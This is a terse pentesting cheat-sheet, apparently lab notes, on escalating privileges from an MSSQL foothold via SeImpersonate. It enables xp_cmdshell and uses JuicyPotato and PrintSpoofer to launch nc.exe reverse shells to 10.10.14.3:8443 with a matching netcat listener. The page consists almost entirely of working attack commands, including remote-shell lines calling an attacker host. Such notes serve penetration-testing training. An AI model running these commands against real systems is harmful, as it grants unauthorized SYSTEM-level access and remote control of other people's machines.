5.Seimpersonate-and-seassignprimarytoken
MSSQL Privilege Escalation
mssqlclient.py sql_dev@10.129.43.30 -windows-authEnable xp_cmdshell
enable_xp_cmdshellExecute commands using xp_cmdshell
xp_cmdshell whoami
xp_cmdshell whoami /privExploiting with JuicyPotato
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *Start netcat listener
nc -lnvp 8443Exploiting with PrintSpoofer
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"Last updated